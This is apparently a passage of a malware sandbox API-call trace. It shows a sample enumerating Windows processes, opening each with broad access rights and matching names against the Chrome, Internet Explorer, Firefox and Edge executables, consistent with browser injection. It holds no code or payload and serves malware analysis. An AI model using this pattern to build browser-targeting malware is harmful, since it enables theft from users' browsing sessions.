	[0240.709] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.709] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0240.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.710] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.710] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0240.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0240.711] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0240.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8394
	[0240.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.712] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0240.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.713] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.714] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0240.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.714] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.715] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0240.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8398
	[0240.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.716] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0240.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.716] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.716] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0240.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.717] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0240.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x839c
	[0240.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.718] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0240.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.718] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.718] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0240.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.719] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.719] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0240.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x83a0
	[0240.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.720] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0240.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.720] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.721] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0240.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.721] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.721] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0240.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x83a4
	[0240.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.722] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0240.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.723] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.723] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0240.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.724] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.725] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0240.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x83a8
	[0240.725] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.725] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0240.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.726] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.726] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0240.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.726] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.726] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0240.727] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x83ac
	[0240.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.727] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0240.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.728] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.728] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0240.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.729] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.729] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0240.730] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x83b0
	[0240.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.730] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0240.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.731] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.731] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0240.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.732] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.732] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0240.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x83b4
	[0240.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.733] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0240.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.733] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.733] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0240.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.734] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.734] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0240.735] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x83b8
	[0240.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.735] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0240.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.735] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.735] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0240.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.736] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.736] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0240.737] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x83bc
	[0240.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.737] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0240.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.737] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.738] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0240.738] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.738] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.739] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0240.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x83c0
	[0240.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.740] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0240.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.741] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.741] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0240.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.742] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.742] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0240.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x83c4
	[0240.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.743] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0240.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.744] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.744] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0240.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.745] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.745] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0240.746] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x83c8
	[0240.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.746] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0240.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.747] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.747] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.748] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0240.748] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.748] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.749] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0240.750] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x83cc
	[0240.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.750] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0240.750] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.750] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.751] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0240.751] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.751] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.752] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0240.752] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x83d0
	[0240.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.753] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0240.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.753] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0240.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.753] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0240.753] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.753] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.754] NtQueryInformationProcess (in: ProcessHandle=0x83d0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0240.754] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0240.754] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0240.755] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x83d4
	[0240.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.755] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0240.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.756] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0240.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.756] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0240.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.756] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.757] NtQueryInformationProcess (in: ProcessHandle=0x83d4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0240.757] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0240.757] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0240.758] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x83d8
	[0240.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.759] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0240.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.759] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.759] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0240.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.760] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.760] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0240.761] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x83dc
	[0240.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.761] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0240.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.761] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.762] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0240.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.762] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.762] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.763] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x83e0
	[0240.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.763] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.763] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.764] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.764] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.765] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.766] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x83e4
	[0240.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.766] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.766] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.767] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.767] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.767] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0240.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x83e8
	[0240.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.768] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0240.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.769] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.769] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0240.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.769] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0240.770] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0240.770] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x83ec
	[0240.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.770] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0240.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.771] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0240.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0240.772] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0240.772] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
